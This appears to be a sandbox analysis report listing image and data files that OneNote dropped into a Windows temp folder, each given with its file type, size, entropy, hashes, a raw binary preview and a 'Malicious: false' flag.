...Mr.=r...K...l..%..m^.......X.(..fG..[Fly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

C:\Users\user\AppData\Local\Temp\{BDF156E7-F8AD-4712-99A4-9F36141E7B37}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2332
Entropy (8bit):	7.8822150338370776
Encrypted:	false
SSDEEP:	48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
MD5:	91CB7F1273AA003076401081B8A22237
SHA1:	5157144069E7D2FDAE60B397BE5851E75BDF7707
SHA-256:	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
SHA-512:	5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
Malicious:	false
Preview:	.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r\|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..\|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

C:\Users\user\AppData\Local\Temp\{BDFBA49E-8C8B-4653-B3CC-9D08B8A84EED}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
Category:	dropped
Size (bytes):	12654
Entropy (8bit):	7.745439197485533
Encrypted:	false
SSDEEP:	384:JheN2cq6MLu6MLGu54cHeNzhcmhcDu53eNE3UPkhrxvu:Ji2Wix7fzVsbE3Zm
MD5:	4BCCCDBB4273ECEBE216C84930A8D0B2
SHA1:	FFBF617787E27BC94D9BAF89F2FE34A2BD42794B
SHA-256:	474F9A8C25D5E21192315397EA995B1E11E2C1608157C6E0277688091BFD136A
SHA-512:	DAD73A8C0E293B88685C0C71EF15E0DC95EE39B7FC9F849DE5D634173FD9FA0AF0AA96742D9E94BE03556AA4A817D5001C95A6736EAD5D5DF03661876785EB74
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................i..............................................E.....................U....V...f..ASTc.......de.1Qq...!Rb....Ca."r.................................B....................b....Ra.....!Qc.....AS.1U.."C...2Bq...$#3%&.............?......3.....~......:..g..s"......:..g..s"..ic..Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. ..0...Q_..X..V5E~..c..X...@u...cTW...0...Q_..;.m.....@w...Q.+.....4W...lUFh....v..._..wn...dW....y._..v..E~......@wn...dW....y._...v..U..@wn...d..{`;.\|U.2g....3...:.0?ViN.z.@w...4.M.:m..`~..i7...q...I....J.`l...W..n..PQTiB...6....+..sj.."...6....+..WA...x..A........(.N6`..AD.q.....'S...t.Q:.l.......f.]..N..0.. .u8..A........_W..Y...}.C...~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~.v..?U..^.r..}..Bep

C:\Users\user\AppData\Local\Temp\{BED74DF2-5D8E-4662-B99E-CC42D75BCEF3}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	7.837610270261933
Encrypted:	false
SSDEEP:	48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
MD5:	EDB5ED43CC6038500A54B90BEC493628
SHA1:	A8CD63F3914E4347F4C5552FB922C6C03917F45F
SHA-256:	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
SHA-512:	4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...........A..!.A.....R.Ai%YH..(M.".h.cf.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8...X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o\|%..7..'.....N.\|..Vi...q..uO,`/....\W{..y...&iI..\|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.\|....8..H......_...G...\|......;6YQ\|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

C:\Users\user\AppData\Local\Temp\{BF990A65-665A-43FE-90D6-FD64085AF6EC}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	86187
Entropy (8bit):	7.951356272886186
Encrypted:	false
SSDEEP:	1536:AbmHwD7za0syWMetp3TdPFzoJamVdAQZCiUit9qbYN6LerhWMzIWgN1EeaYhJM:1QnzsyTeP3TPAdAQZCi5qbYEKrhWWMNO
MD5:	FEE4785DF76E93A9DC2F4501CBAEAE12
SHA1:	8FB4527BDE05EF208FCDB168098A07707C27501F
SHA-256:	F091DED5E283AF6848670A3172E7C43C6099875D39B3FC69C2BDBA914F609602
SHA-512:	7E99D33151A0D3873D6A819C98EA8E62D928C087B7BA2080F11C7BCF746AD60A44D4FF6EE3D2D2E8DFA4BF1FC6285ED56BB83F91C2FC6FC4FDFF2000105F10B1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................1.!Aq...Qa."...2..BR#...br......6v.7..3.CSc...$4.s..&dt%u.f.......................!1.AQ..aq........"2.B#....Rb3..t.5u.67.8.r..$....C4.cs.Sd%.DEUe&.............?............w.....c.....i.A.....3...7.......7..P......%.........?Th..l./?.;.....$}..=5Oa...F.c.A/...D.D..]..y..3e.5\%.fo2.X.]q.5Ee.}..i..md.T....#...-...Mu...9...-+..~w5O.);..G..'.;..).....A_...M.vV..y.q......,<.3.(...._K:..XM.......w.......9..T.......?b..a-%.c;.}..>....\|.,lZKCEB.t...fw\|.Sw^..Y..:.J.................t._P..v..j.1.R8.R....G..WH<(Xi........i..xcu...WM.dqM>'W..g....M.q.....+.....b'..~....>..T.~Jc....fj.X.x..9...N.w.6:..>.......&.(h..u...t._...)_k#7Za...cZ....P...Y..;.V.,..xo.....f........Y...\6...M'L._

C:\Users\user\AppData\Local\Temp\{C07B4FF5-E4AF-4C56-9395-8D0539739D5F}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2210
Entropy (8bit):	7.86853667196985
Encrypted:	false
SSDEEP:	48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
MD5:	73E38124F94AD20A2F1571FBBE11AEEC
SHA1:	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
SHA-256:	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
SHA-512:	320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
Malicious:	false
Preview:	.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1\|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B\|CW......sO..\.=..&3...,.

C:\Users\user\AppData\Local\Temp\{C124AD3C-9463-46FF-B18E-61CBEFDF06B2}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	7.837610270261933
Encrypted:	false
SSDEEP:	48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
MD5:	EDB5ED43CC6038500A54B90BEC493628
SHA1:	A8CD63F3914E4347F4C5552FB922C6C03917F45F
SHA-256:	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
SHA-512:	4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...........A..!.A.....R.Ai%YH..(M.".h.cf.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8...X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o\|%..7..'.....N.\|..Vi...q..uO,`/....\W{..y...&iI..\|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.\|....8..H......_...G...\|......;6YQ\|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

C:\Users\user\AppData\Local\Temp\{C1CD7103-E063-4264-A5AD-F624453541CD}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
Category:	dropped
Size (bytes):	59832
Entropy (8bit):	7.308211468398169
Encrypted:	false
SSDEEP:	1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
MD5:	DCDD543A4E0BA2C1909BA095D46FFBCB
SHA1:	B86C89537138FE07255354202D3EAD0B53B3C54D
SHA-256:	28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
SHA-512:	5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
Malicious:	false
Preview:	......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

C:\Users\user\AppData\Local\Temp\{C4EE2ABE-5DA8-495C-AD3D-AB07E4791071}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.7011392520659736
Encrypted:	false
SSDEEP:	6:hjYyfh3h19zXUnf0f6Q1vtjoOHKw3Tl7FATl/lBRuj8lvClax/AdTl/ljRujd:RYyfd9jUf0fJ1ZoOt34fV/x/MO
MD5:	B52949EF1C4C4ECCDAA360E2654D6111
SHA1:	8812658BFE25716FC0B793F2D3C66DFEAF4A1A2B
SHA-256:	F5073720B4A7E991D7FF9116C3255FB35B6C614B38BC2D005C0E806454E562FB
SHA-512:	9A24E82556C84399F6C04247791930CD5AFB0AABEBA255CA35A9D9A94E86D2AC412D3119855989AA9F7B5F807830FADBFEB7EFE911F1FC0CAD9F0AC1F60DDEFE
Malicious:	false
Preview:	.R\{..M..Sx.)...3z(F.]k.p...................?.....I...................................................................J....X.N...'.m.;0.......................h.............................................z,.w.F.{.~..>...............L......uk.............................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{C58067CF-5AE5-4264-A2E3-7B36C06CF432}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13737
Entropy (8bit):	7.916899917415529
Encrypted:	false
SSDEEP:	384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
MD5:	830632032C7DDBCCDE126F4BAE935540
SHA1:	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
SHA-256:	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
SHA-512:	5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
Malicious:	false
Preview:	.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

C:\Users\user\AppData\Local\Temp\{C580B290-0DD5-4463-BFCE-E2184D613FE3}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.950380155401321
Encrypted:	false
SSDEEP:	96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
MD5:	BC6C08F8C2C6D1EEE95ABFC40C3C3669
SHA1:	44DE7375375880ACC24938D7E92A837E85C35321
SHA-256:	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
SHA-512:	2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
Malicious:	false
Preview:	.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_...c..n.......?....wa..l...p....E.Ly.}......C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<\|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...\|....\..O.....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...\|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..k.Y....z.;?..^...3.4\|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

C:\Users\user\AppData\Local\Temp\{C86C9CB3-A183-4373-86E2-01CBEA2C0641}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
Category:	dropped
Size (bytes):	27862
Entropy (8bit):	7.238903610770013
Encrypted:	false
SSDEEP:	384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
MD5:	E62F2908FA5F7189ED8EEBD413928DEE
SHA1:	CA249B4A70924B73BDA52972E9C735AEC35A0C5D
SHA-256:	20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
SHA-512:	EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..\|.Q..I.&.. ......"T4)wdH.

C:\Users\user\AppData\Local\Temp\{C91072F9-27AF-42C0-A76C-0515173710B5}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	17289
Entropy (8bit):	7.962998633267186
Encrypted:	false
SSDEEP:	384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
MD5:	708E8EB906BC105CCA0535AE669AA651
SHA1:	38D82DEDFE97D3001188C2E18FE13BD741FD520F
SHA-256:	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
SHA-512:	1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }...B@....i<8.....B@.T2 .........xp..! .....d@...!......(B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'\|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

C:\Users\user\AppData\Local\Temp\{CA9BF441-B223-4FA7-BE15-E4516D677C20}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
Category:	dropped
Size (bytes):	65998
Entropy (8bit):	7.671031449942883
Encrypted:	false
SSDEEP:	1536:klZtmExaFrtWgpc+Sg+DKeplHClpHfRtPMbe:VEWWl+SNDKqlH8p/vse
MD5:	B4F0A040890EE6F61EF8D9E094893C9C
SHA1:	303BCBA1D777B03BFD99CC01A48E0BB493C93E04
SHA-256:	1F81DDE3B42F23F0666D92EBF14D62893B31B39D72C07AEE070EAE28C2E6980E
SHA-512:	8F07E4D519F2FD001006BB34F7F8274B9AF9EC55367B88D41D24E5824FCE4354FD1290CE4735E43930829702ED53F41DF02C673904A7091E9354C28E029AD4EF
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:09:29.............................a.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..-O..s(...gO..@...[..+....+...H.'m........L.......@.......[k...S..O..p.'{X..3......]W..w.+.V....[.-.....2..i..i$.p.

C:\Users\user\AppData\Local\Temp\{CB035F62-477E-4921-B245-622B5A5E4856}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	136726
Entropy (8bit):	7.973487854173386
Encrypted:	false
SSDEEP:	3072:SIXmy5Tl704vW2ZKkvV8UU0ZWUF0BJwySIdgz816YzDc1+opecYPn:Sny5Tl704fZFV8UU6LGXwyS4xohpQPn
MD5:	4A2472AC2A9434E35701362D1C56EDDF
SHA1:	16FA2EA2D2808D75445896E03B67A93000EEDDD8
SHA-256:	505F731CB7707EFAB2EB06685B392DC7E59265A40B55AAE43E5DC15C0A86CBA4
SHA-512:	5E28D8FB2AC62ED270968072A30013334461F7CAE96058AF9EAA6E10912989DC47112D2133892BF61F7A516B77C6FF71BA2A000B750A9F95C787E538B09595C2
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQaq".....2B....R#..b3...r...C$...X.....Sc...9.%'.(Hs4Dgw..T..5GW.x.)......................!.1..AQa"2.q.......B..#c........b6.Rr.3s$.&..S...C4.%5............?.........(......(......(......(......(......(......(......(.G/.GE&...)..P.x..B.({i2Y;.z?G...Yfc.)H..^....#.....}3..Sc^.H..+...M.a.P.....GS.....H_.3..<....1f........1.<.\..nn-..s.s.\9Y....=.......S.0.......N..cA..Io..r.3..........ay.....K.....,.;9..Q......xO.Fa.2..>........{4k.....\|....?U....3.8..._/3....#.. t.y......yY.......e.<........#.....B.....Z.%.Y..S.ye.W4...l.......X...%.@y}>....l.yi..D..W......L..._D.Q....)...E....n.%...*..K.4#.8`..I....h..h.o..I......-...hB...3..u.(5..........n...,.@....a.t.9.....@.s.>.&...@

C:\Users\user\AppData\Local\Temp\{CC8ACB40-3F1C-40F3-82BB-AEE475250338}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19235
Entropy (8bit):	7.944867159042578
Encrypted:	false
SSDEEP:	384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
MD5:	AE32E846559D576FD263BD69FEDBEC28
SHA1:	D481DF71C858BAECFE33418002D368F2DCF68D4A
SHA-256:	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
SHA-512:	9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=\|z7.Z.\|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.u.j..S.C=...\|.....2..(YF........\|....7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

